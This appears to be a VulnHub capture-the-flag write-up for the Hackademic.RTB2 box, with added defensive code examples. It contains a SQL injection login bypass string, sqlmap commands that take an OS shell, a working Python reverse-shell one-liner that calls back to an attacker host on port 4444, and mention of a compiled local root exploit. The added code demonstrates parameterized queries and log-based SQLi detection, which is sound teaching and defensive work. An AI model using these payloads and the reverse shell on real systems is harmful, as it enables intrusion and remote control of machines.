Enumeration With Nmap
# Nmap 7.91 scan initiated Mon Sep 27 09:18:59 2021 as: nmap -sC -sV -p- -vv -oA nmap 172.16.139.228
Nmap scan report for 172.16.139.228
Host is up, received syn-ack (0.0017s latency).
Scanned at 2021-09-27 09:18:59 WAT for 9s
Not shown: 65534 closed ports
Reason: 65534 conn-refused
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.2.14 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.14 (Ubuntu)
|_http-title: Hackademic.RTB2
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 27 09:19:08 2021 -- 1 IP address (1 host up) scanned in 8.95 seconds
Should be easy, I guess: we have only one port open, the HTTP port 80, so let's hit it.
Ahhh, the demon login page. I say damn because, man, I was stuck for some hours trying SQL injection and sqlmap and got nothing. You know what's funny? It actually is vulnerable to SQL injection, which I found after checking a write-up for this part.
username:- ' or 1=1--'
password:- ' or 1=1--'
That's the SQL injection that worked; I don't know why all the payloads I tried were not working.
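To show why that login string works and what the fix looks like, here is an added example (not code from the write-up or from the box's application): a constructed in-memory SQLite user table with a login written the vulnerable way, string concatenation, next to the same login written with bound parameters. The `users` table, the `admin` account and the `hash_pw` helper are assumptions for the demonstration; the payload is the one from the write-up, carried in the username field.

```python
import hashlib
import sqlite3


def hash_pw(pw):
    # Illustration only: a production app uses a salted, slow KDF (bcrypt/argon2).
    return hashlib.sha256(pw.encode()).hexdigest()


def make_db():
    """Constructed in-memory user table standing in for the app's real one."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                 ("admin", hash_pw("correct horse")))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    # The bug: the username is pasted straight into the SQL text, so a quote
    # ends the string literal and '--' comments out the rest of the WHERE clause,
    # leaving "username = '' OR 1=1", which matches every row.
    query = ("SELECT id FROM users WHERE username = '%s' AND pw_hash = '%s'"
             % (username, hash_pw(password)))
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    # The fix: bound parameters. The driver passes the payload as data, never as SQL,
    # so the quote and the comment marker are just characters in a username nobody has.
    query = "SELECT id FROM users WHERE username = ? AND pw_hash = ?"
    row = conn.execute(query, (username, hash_pw(password))).fetchone()
    return row is not None


PAYLOAD = "' or 1=1--'"   # the bypass string from the write-up


def demo():
    conn = make_db()
    return {
        "vulnerable_bypassed": vulnerable_login(conn, PAYLOAD, PAYLOAD),
        "safe_bypassed": safe_login(conn, PAYLOAD, PAYLOAD),
        "safe_real_creds": safe_login(conn, "admin", "correct horse"),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable version returns a row for the payload because the query text itself changed; the parameterized version returns nothing for it and still accepts the real credentials, which is the whole point of keeping data out of the statement text.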
Now we are in, let's check the page source, maybe we can get some clues to move on.
I think we have something in the source.
It's URL-encoded, so using CyberChef I URL-decode it and we get hex.
Decoding from hex we get binary, with a hint: Knock Knock Knockin' on heaven's door .. :)
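The CyberChef chain above (URL-decode, then from hex, then read the result) is easy to script so the next layered hint does not cost an afternoon. The following is an added example, not code from the write-up: it detects one encoding layer at a time, strips it, and stops when nothing recognisable is left. It goes a little beyond the post's chain by also recognising base64 and naming a decoded blob by its magic bytes, which is the same trick the Key.txt step near the end of the post needs. The exact page-source string is not reproduced in the write-up, so `HINT` and the `encode_like_page` builder are constructed to have the same shape, and `knock_candidates` assumes the knock sequence appears as plain port numbers in the hint.

```python
import base64
import re
from urllib.parse import unquote

# Magic numbers used to name a decoded blob instead of printing garbage.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF8": "gif",
    b"PK\x03\x04": "zip",
}


def identify(blob):
    """Name a decoded blob by its magic bytes, or None if it is not a known file type."""
    for magic, name in MAGIC.items():
        if blob.startswith(magic):
            return name
    return None


def _text_or_blob(raw):
    # Keep known file types as bytes; turn anything else that is valid UTF-8 into text.
    if identify(raw):
        return raw
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw


def decode_once(text):
    """Recognise one encoding layer and strip it.
    Returns (layer_name, result): a str means more layers may follow, bytes means a
    file or opaque blob. Returns None when no layer is recognised."""
    s = text.strip()
    if re.search(r"%[0-9A-Fa-f]{2}", s):
        return "url", unquote(s)
    compact = re.sub(r"\s+", "", s)
    if re.fullmatch(r"[01]{8,}", compact) and len(compact) % 8 == 0:
        raw = int(compact, 2).to_bytes(len(compact) // 8, "big")
        return "binary", _text_or_blob(raw)
    if re.fullmatch(r"[0-9A-Fa-f]+", compact) and len(compact) % 2 == 0:
        return "hex", _text_or_blob(bytes.fromhex(compact))
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact) and len(compact) % 4 == 0:
        try:
            raw = base64.b64decode(compact, validate=True)
        except ValueError:
            return None
        out = _text_or_blob(raw)
        # Only accept base64 when it yields text or a known file type; otherwise the
        # input was probably just a word that happens to fit the base64 alphabet.
        if isinstance(out, str) or identify(out):
            return "base64", out
    return None


def peel(text):
    """Strip layers until nothing is recognised. Returns [(layer, value), ...]."""
    layers = []
    cur = text
    while isinstance(cur, str):
        step = decode_once(cur)
        if step is None:
            break
        layers.append(step)
        cur = step[1]
    return layers


def knock_candidates(text):
    # Assumption: the knock sequence is written as plain port numbers inside the hint.
    return [int(tok) for tok in re.findall(r"\b\d{2,5}\b", text)]


# Constructed sample with the same shape as the page-source clue: text -> hex -> percent-encoded.
HINT = "1001 1101 1011 1001 Knock Knock Knockin' on heaven's door .. :)"


def encode_like_page(plain):
    hexed = plain.encode().hex()
    return "".join("%%%02X" % b for b in hexed.encode())


SAMPLE = encode_like_page(HINT)

# Constructed: base64 of a stub PNG header, the shape Key.txt has later in the post.
PNG_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + b"\x00" * 8).decode()

if __name__ == "__main__":
    for layer, value in peel(SAMPLE):
        print(layer, "->", value if isinstance(value, str) else identify(value))
    print("knock sequence:", knock_candidates(peel(SAMPLE)[-1][1]))
```

The order of the checks matters: binary is tested before hex because a run of 0s and 1s is also valid hex, and hex before base64 because hex digits are a subset of the base64 alphabet. Lengths are checked too, so a short plain word does not get misread as an encoded layer.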
Boom, we have the port sequence to knock. I will be using nmap to hit the ports in that order, with the -r switch so nmap does not randomize the port order.
nmap -r -p 1001,1101,1011,1001 172.16.139.230
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ nmap -r -p 1001,1101,1011,1001 172.16.139.230
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 12:15 WAT
WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
Nmap scan report for 172.16.139.230
Host is up (0.0033s latency).
PORT STATE SERVICE
1001/tcp closed webpush
1011/tcp closed unknown
1101/tcp closed pt2-discover
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ nmap -sV 172.16.139.230
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 12:16 WAT
Nmap scan report for 172.16.139.230
Host is up (0.0015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.23 seconds
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ nmap -sV 172.16.139.230
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-27 12:16 WAT
Nmap scan report for 172.16.139.230
Host is up (0.0019s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
666/tcp open http Apache httpd 2.2.14 ((Ubuntu))
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
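What just happened, a service that is only reachable after the knock, is exactly the kind of change a periodic scan diff catches on the defending side. As an added example, not code from the write-up, here is a small parser for nmap's normal output that maps each port to its state and version and reports which ports opened or closed between two scans. The `BEFORE` and `AFTER` inputs are the two -sV outputs pasted above.

```python
import re

# One port line of nmap's normal output: "80/tcp open http Apache httpd 2.2.14 ((Ubuntu))"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


def parse_nmap(text):
    """Map 'port/proto' -> (state, service, version) from nmap normal output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            key = "%s/%s" % (m["port"], m["proto"])
            ports[key] = (m["state"], m["service"], (m["version"] or "").strip())
    return ports


def diff_scans(before, after):
    """Ports that became open, and ports that stopped being open, between two scans."""
    b, a = parse_nmap(before), parse_nmap(after)
    opened = sorted(k for k in a if a[k][0] == "open" and b.get(k, ("closed",))[0] != "open")
    closed = sorted(k for k in b if b[k][0] == "open" and a.get(k, ("closed",))[0] != "open")
    return {"opened": opened, "closed": closed}


# The two scans from the write-up, before and after the knock.
BEFORE = """\
Nmap scan report for 172.16.139.230
Host is up (0.0015s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
"""

AFTER = """\
Nmap scan report for 172.16.139.230
Host is up (0.0019s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
666/tcp open http Apache httpd 2.2.14 ((Ubuntu))
"""

if __name__ == "__main__":
    print(diff_scans(BEFORE, AFTER))
    for key, (state, service, version) in parse_nmap(AFTER).items():
        print(key, state, service, version)
```

Run against scans saved with -oN over time, the diff is a cheap way to notice a port that was never meant to be reachable from outside; nmap's -oX output is the better input for a real pipeline, but the line format above is what lands in a paste.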
We have a new port open now, let's try to access it.
Powered by Joomla. Going smoothly through the pages I found something interesting with some strange parameters.
I decided to test it with sqlmap.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ sqlmap -u "http://172.16.139.230:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --dbs
Boom, it's vulnerable to SQL injection. Let's try the --os-shell switch in sqlmap with the database joomla.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/hackad]
└─$ sqlmap -u "http://172.16.139.230:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla --os-shell
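From the other side of the wire, an automated injection run like this one is loud in the Apache access log. Here is an added example, not code from the write-up, that parses combined-format log lines, URL-decodes the request path and query string, and flags requests that carry common injection probes or sqlmap's default user-agent. The log lines are constructed to resemble such a run against the component above; the `letter=A` value, the timestamps and the client addresses are made up. One caveat, noted in the code as well: the access log holds the query string but not POST bodies, so a payload sent through a login form needs application-level logging to be seen.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures checked against the URL-decoded path + query string.
SQLI_PATTERNS = [
    (re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I), "boolean-probe"),
    (re.compile(r"union\s+(all\s+)?select", re.I), "union-select"),
    (re.compile(r"\b(sleep|benchmark)\s*\(", re.I), "time-based"),
]


def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the reasons a request looks like injection testing (empty if clean)."""
    reasons = []
    if "sqlmap" in entry["ua"].lower():
        # Default user-agent; trivially changed, so never rely on it alone.
        reasons.append("sqlmap user-agent")
    # Access logs record the query string only; POST bodies (e.g. a login form)
    # are not here and need application-level logging.
    decoded = unquote_plus(entry["path"])
    for pattern, name in SQLI_PATTERNS:
        if pattern.search(decoded):
            reasons.append(name)
    return reasons


def scan(lines):
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["path"], reasons))
    return hits


def suspicious_ips(lines, threshold=2):
    """Clients with at least `threshold` flagged requests, sorted."""
    counts = Counter(ip for ip, _, _ in scan(lines))
    return sorted(ip for ip, n in counts.items() if n >= threshold)


# Constructed sample log lines (not from the box).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Sep/2021:12:30:01 +0100] "GET /index.php?option=com_abc&view=abc&letter=A&Itemid=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [27/Sep/2021:12:30:05 +0100] "GET /index.php?option=com_abc&view=abc&letter=A%27+AND+1%3D1--+&Itemid=3 HTTP/1.1" 200 5120 "-" "sqlmap/1.5 (https://sqlmap.org)"
10.0.0.5 - - [27/Sep/2021:12:30:06 +0100] "GET /index.php?option=com_abc&view=abc&letter=A%27+UNION+ALL+SELECT+NULL--+&Itemid=3 HTTP/1.1" 200 6000 "-" "Mozilla/5.0"
10.0.0.9 - - [27/Sep/2021:12:31:00 +0100] "POST /index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG.splitlines()):
        print(ip, reasons, path)
    print("suspicious:", suspicious_ips(SAMPLE_LOG.splitlines()))
```

Decoding before matching is the important step: the probes arrive as `%27+AND+1%3D1` on the wire, and a rule that looks for a literal quote in the raw line misses them.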
___
We have a shell, smooth right? Now let's try and get a proper shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.139.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now let's root it, we are taking long man lol.
Privilege Escalation
Pretty old versions, let's hit exploit-db.
We have the exploit, now let's get it onto our target and compile it.
Running it, and boom, root.
Getting the Key.txt in the root folder.
But it's in base64, let's try and get it out.
Starting SimpleHTTPServer on the target opens port 8000, which we can access with the target IP:8000.
Now let's get the Key.txt to decode.
Using CyberChef we know it's a PNG image encoded in base64.
Using CyberChef to convert it back to PNG.
We are done.
Greeting From Muzec